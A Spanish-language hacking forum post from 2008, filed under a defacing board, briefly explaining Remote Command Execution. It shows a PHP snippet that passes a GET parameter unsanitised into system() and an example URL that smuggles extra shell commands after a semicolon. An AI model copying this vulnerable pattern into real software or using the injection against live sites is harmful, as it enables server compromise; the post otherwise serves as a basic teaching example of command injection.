vZack
Noviembre 19, 2008, 05:20:03 pm
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
1 Hora
1 Día
1 Semana
1 Mes
Siempre
Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias
: Retos de vZack.com, demuestra todo lo que sabes sobre vulnerabilidades a nivel web
click aquí para acceder
Inicio
Ayuda
Ingresar
Registrarse
vZack
>
Underground
>
Defacing
>
RCE (Remote Command Execution)
Páginas: [
1
]
Ir Abajo
« anterior
próximo »
Imprimir
Autor
Tema: RCE (Remote Command Execution) (Leído 425 veces)
vZor
Administrator
Dios del caos
Desconectado
Sexo:
Mensajes: 223
RCE (Remote Command Execution)
«
en:
Agosto 19, 2008, 07:01:24 pm »
RCE (Remote Command Execution)
¿De Que se trata?
Es un bug que nos permite ejecutar comandos remotamente.
Ejemplo de codigo vulnerable
Código:
<?php
if(isset(
$_GET
[
'dir'
])){
system
(
'ls '
.
$_GET
[
'dir'
]);
}
?>
Explicacion / Como explotarlo
Para explotarlo simplemente metemos nuestro comando, terminando el anterior
Código:
http://pagina.com/dir.php?dir=a;uname -a;pwd;ls -la
Salu2
En línea
Páginas: [
1
]
Ir Arriba
Imprimir
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Administración y miscelanea
-----------------------------
=> vZack
=> Dudas y sugerencias
=> Off-Topic
=> ShowOff
-----------------------------
Underground
-----------------------------
=> Hacking general
=> Defacing
=> Malware
-----------------------------
Hardware y redes
-----------------------------
=> Redes
===> Seguridad
=> Anonimato
-----------------------------
Programacion
-----------------------------
=> Programacion General
===> C/C++
===> Delphi
===> Python
===> Perl
===> Java
=> Webmasters
===> Html
===> Php & MySQL
===> JavaScript
-----------------------------
Interes General
-----------------------------
=> Diseño Grafico
===> Galeria
===> Tutoriales
=> Almacén de manuales
-----------------------------
Papelera
-----------------------------
=> Posts Viejos
Loading...